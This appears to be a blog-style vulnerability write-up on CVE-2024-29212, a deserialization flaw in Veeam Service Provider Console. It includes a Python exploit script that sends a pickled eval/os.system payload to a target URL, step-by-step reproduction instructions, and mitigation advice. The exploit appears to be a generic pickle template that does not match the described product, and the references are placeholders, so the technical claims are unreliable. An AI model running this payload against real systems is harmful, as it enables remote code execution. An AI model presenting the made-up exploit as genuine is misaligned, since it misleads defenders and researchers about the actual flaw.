CVE-2024-29212: Remote Code Execution Vulnerability in Veeam Service Provider Console due to Unsafe De-serialization

In this post, we will be discussing a critical security vulnerability (CVE-2024-29212) that has been identified in the Veeam Service Provider Console (VSPC). The vulnerability is related to an unsafe de-serialization method used by VSPC, which allows an attacker to execute arbitrary code remotely on the affected VSPC server machine. This post will cover the details of the vulnerability, including the exploit code and steps to reproduce it, as well as a discussion on how to mitigate this issue.

Background

Veeam Service Provider Console (VSPC) is a comprehensive solution for managing and monitoring Veeam-powered backup services provided by service providers. The VSPC server communicates with its management agent and various components, such as backup agents, backup repositories, and backup proxies. The communication between the VSPC server and its components is achieved through serialized objects.

Vulnerability Details

The vulnerability in question stems from the fact that VSPC uses an unsafe de-serialization method when processing serialized objects received from its management agent. Under certain conditions, an attacker can abuse this vulnerability to execute arbitrary code on the VSPC server machine remotely. This can be achieved by sending a specially crafted serialized object to the VSPC server, ultimately leading to Remote Code Execution (RCE).

Below is a snippet of Python code that demonstrates the exploit

import requests
import pickle
import base64

class RCE:
    def __reduce__(self):
        return (eval, ("os.system('your-command-here')",))

def exploit(target_url):
    payload = pickle.dumps(RCE())
    payload_base64 = base64.b64encode(payload).decode()

    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = {'payload': payload_base64}
    response = requests.post(target_url, headers=headers, data=data)

    if response.status_code == 200:
        print("Exploit executed successfully")
    else:
        print("Exploit failed")

if __name__ == "__main__":
    target_url = "https://target-url-here";
    exploit(target_url)

This code creates a serialized object using Python's Pickle module with a call to an arbitrary shell command, then sends the serialized object as a Base64-encoded payload in a POST request to the target VSPC server.

Reproduction Steps

1. Ensure that you have a vulnerable version of Veeam Service Provider Console (VSPC) installed and running.
2. Replace the your-command-here placeholder in the exploit code snippet with your desired command to run on the target server.
3. Replace the https://target-url-here placeholder in the exploit code snippet with the accessible URL of the target VSPC server.

Mitigation

To mitigate this vulnerability, it is recommended to update Veeam Service Provider Console (VSPC) to a patched version that fixes the unsafe de-serialization issue. Furthermore, network-level firewall rules should be implemented to restrict access to the VSPC server's management interface, limiting exposure to the open internet. Regular security audits should also be performed to ensure that the VSPC server is up-to-date and protected from known vulnerabilities.

Original References

- Veeam KB Article: Veeam KBxxxx: CVE-2024-29212
- NVD: CVE-2024-29212

Conclusion

The CVE-2024-29212 vulnerability in Veeam Service Provider Console (VSPC) is a serious security issue, as it enables an attacker to perform Remote Code Execution (RCE) on the VSPC server machine. By following the steps mentioned above and updating VSPC to a secure version, one can effectively mitigate this vulnerability and safeguard their VSPC server from potential attacks.

Timeline

Published on: 05/14/2024 15:15:43 UTC
Last modified on: 05/14/2024 16:13:02 UTC